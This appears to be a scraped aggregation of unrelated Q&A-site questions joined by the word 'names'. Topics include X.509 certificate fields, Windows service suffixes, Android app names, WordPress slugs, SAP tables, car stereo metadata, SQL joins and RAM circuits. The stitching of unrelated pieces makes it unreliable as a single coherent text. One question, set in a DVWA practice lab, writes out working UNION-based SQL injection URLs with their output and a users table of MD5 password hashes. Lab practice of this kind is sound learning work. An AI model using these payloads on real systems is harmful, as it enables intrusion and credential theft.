Where are field names of decoded human readable X.509 certificates specified?

The ASN.1 module for X.509 certificates as specified in RFC 5912 – Section 14 is as follows:

TBSCertificate  ::=  SEQUENCE  {       version         [0]  Version DEFAULT v1,       serialNumber         CertificateSerialNumber,       signature            AlgorithmIdentifier{SIGNATURE-ALGORITHM,                                 {SignatureAlgorithms}},       issuer               Name,       validity             Validity,       subject              Name,       subjectPublicKeyInfo SubjectPublicKeyInfo,       ... ,       [[2:               -- If present, version MUST be v2       issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,       subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL       ]],       [[3:               -- If present, version MUST be v3 --       extensions      [3]  Extensions{{CertExtensions}} OPTIONAL       ]], ... }  

The field names are the same in RFC 5280.

The decoded example certificate on the X.509 Wikipedia page however has completely different field names:

Certificate:     Data:         Version: 3 (0x2)         Serial Number:             10:e6:fc:62:b7:41:8a:d5:00:5e:45:b6         Signature Algorithm: sha256WithRSAEncryption         Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2         Validity             Not Before: Nov 21 08:00:00 2016 GMT             Not After : Nov 22 07:59:59 2017 GMT         Subject: C=US, ST=California, L=San Francisco, O=Wikimedia Foundation, Inc., CN=*.wikipedia.org         Subject Public Key Info:             Public Key Algorithm: id-ecPublicKey                 Public-Key: (256 bit)             pub:                      00:c9:22:69:31:8a:d6:6c:ea:da:c3:7f:2c:ac:a5:                     af:c0:02:ea:81:cb:65:b9:fd:0c:6d:46:5b:c9:1e:                     9d:3b:ef                 ASN1 OID: prime256v1                 NIST CURVE: P-256         X509v3 extensions:             X509v3 Key Usage: critical                 Digital Signature, Key Agreement          ... 

Signature Algorithm instead of algorithm, X509v3 extensions instead of just extensions.

Since the certificate has version 3, i would assume it doesn’t have anything to do with the version…

Of course i searched for various field names like X509v3 Key Usage or X509v3 CRL Distribution Points but couldn’t find any reference.

So where are the field names of the decoded human readable X.509 certificate specified or mapped?

Suspicious termination in some Windows Services names [closed]

Introduction

I’ve been poking around the Services tab on my Windows machine and saw some services with a "normal" name but this termination _1f699ad as in the next examples:

  • ConsentUX_1f699ad
  • CredentialEnrollmentManagerUserSvc_1f699ad
  • DevicePicker_1f699ad
  • and many more with the same termination

Here some pictures taken from the services tab.

enter image description here enter image description here enter image description here

My question is simple: Is this OK or should I be worried?

Because some of them have access to ScreenCapture and others which can potentially be harmful (i.e data theft) and I see no reason to add a meaningless termination other than supersede and stay hidden.

DVWA SQLi: How to get column names from table “users” only? [closed]

This is DVWA database. There are only 2 tables in it.

mysql> show tables;  +----------------+ | Tables_in_dvwa | +----------------+ | guestbook      |  | users          |  +----------------+ 2 rows in set (0.00 sec)  mysql>  

I’ve no issue getting these 2 tables via SQL injection bug

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=' UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web (TABLE_NAME in “dvwa” DATABASE)

First name: guestbook,users 

Table “users” looks interesting and would like to know all columns in it.

There are 6 columns as shown in MySQL query below.

mysql> SELECT * FROM users; +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ | user_id | first_name | last_name | user    | password                         | avatar                                                | +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ |       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/admin.jpg   |  |       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg |  |       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://172.16.123.129/dvwa/hackable/users/1337.jpg    |  |       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   |  |       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  |  +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ 5 rows in set (0.00 sec)  mysql>  

However, my next attempt to get only columns from table users didn’t work well.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=' UNION SELECT GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web

First name: comment_id,comment,name,user_id,first_name,last_name,user,password,avatar 

The problem is columns comment_id,comment,name are not part of users table.

What’s wrong in this SQLi syntax and how do I get only column names from table users only.

DESIRED OUTPUT

First name: user_id,first_name,last_name,user,password,avatar 

Its there any built int protection against deceptive app names in Android or that make app listings trustable?

Some functionalities rely on app names and icons for proper use. Like firewall, installed apps list, memory usage statistics. I wonder if there is anything fobidding an app to appear with deceptive names and icons on this apps.

Like, in my firewall, there are over 20 apps who show android icons or have names I don’t know what mean and I don’t have a clue if they are legit.

The built in memory usage functionality from the developer options, for instance, has these two entries: “Android operating system” and “Android system”. I also don’t know if thats correct and both are legit. I’d expect only one such line. The first one use around 500mb, has kernel info and no “stop” option, as on would expect from a OS. The second, uses 2mb and has a “details” page with a “stop” button.

Are there any mechanisms which forbid 3rd party apps of having android icons, or to have names that suggest they they are part of Android?

Is it safe to assume that app listings will really show all installed apps (is there a way for malicious apps keep themselves from showing on these lists)? Is there an official list of apps which are part of android which allows us to identify, for instance, what its safe to allow in our firewalls?

How to rename post names and slugs in bulk?

I have nearly more than 10000 posts in my WordPress site. Now, I want to add(concatenate) a text to all my posts’ names & URLs under a certain category alone. How to do this task in an easy way? Manually work seems very time-consuming.

It is now, before renaming: Post name:152, slug: https://example.com/152 After renaming it should be: Post name:text-152, slug: https://example.com/text-152

Getting full (purpose, usage) Table names in SAP Hana

Each table in SAP Hana has a purpose, for example, BSEG is Accounting Document Segment and BKPF is Accounting Document Header.

Is there anything in Hana (along the lines of Select * From Tables) or a full list elsewhere on the Intertubes, that will get me the purpose\usage of each table in Hana?

I’m trying to put together a Workflow for Alfred that’ll allow me to look up the definitions and it would be nice if I can get it to tell me “Look Up BSEG (Accounting Document Segment)” as I’m searching inside the workflow.

I’ve already got the list of names, just really could do with that purpose\usage if possible!

How does my car stereo find the album art and album and track names? And how do I stop it?

When I listen to the radio or a compact disc in the car, the stereo sometimes displays the album art and the title of the album and track. Sometimes instead of album art it displays a genre (like “Country”) and a related graphic (like an anonymous model smiling and wearing a cowboy hat). In the case of a c.d. it also displays other information, like “1/12” for the first track on an album with 12 tracks, information about time, and so on.

Usually, everything it says is correct. Sometimes it gets something wrong. For example here’s a photo of the stereo playing the Beatles “Let It Be” but displaying the album art for another album.

enter image description here

It seems plausible that the stereo is reading some of this information from the disc (or from the radio signal). But it seems unlikely to me that the album art is included on the disc, particularly in this case in which incorrect art is displayed. What seems more plausible to me is that when I put in the disc, my car stereo reads information from the disc to identify the disc and then retrieves this information from some database outside of the car.

Wouldn’t this mean that some agency somewhere is logging what music I listen to? Is it doing this when I listen to radio too? Is there any way for me to listen to radio and c.d.’s in the car without this part of the process? For example can I copy the c.d.’s in some way that strips the identifying information from the copy?

And what WOULD be the correct Stack Exchange, or the correct place on the internet, to seek help with this question?

List all column names for multi-joined table

I have a slightly more complicated join:

SELECT person.given_name, person.family_name, person.age, person.sex, person.state,        person.zip, person.street, person.residential_number,        c1.name as citizen_of_country,        c2.name as hospitalization_country,        c3.name as infection_country  FROM patients      JOIN person on patients.person_id = person.id     JOIN country c1 on person."citizenOf_country_id" = c1.id     JOIN country c2 on patients.hospitalized_in_country_id = c2.id     JOIN country c3 on patients.infected_in_country_id = c3.id; 

.. and I’d like to somehow get the name of all columns in this new table. Based on some answers I found, I tried

SELECT DISTINCT column_name FROM information_schema.columns WHERE table_schema = 'public' AND [code]; 

Where [code] is the block above.. But it didn’t work, giving the error “Subquery must return only one column”. I’m new to databases so I’m not sure how to handle this correctly.

Names of circuits that comprise memory

I just had a quick question about memory, and I was looking to get some insight. I’m a student, and one of our homework questions was “name two circuits aside from memory cells that RAM must contain in order to complete fetch and store operations”. I answered the MAR/MDR, which was counted as correct, with a note that technically this isn’t what was asked, as those are both registers.

Would anyone be able to provide any insight into what the actual circuits would be that allows RAM to perform these operations? Thanks!!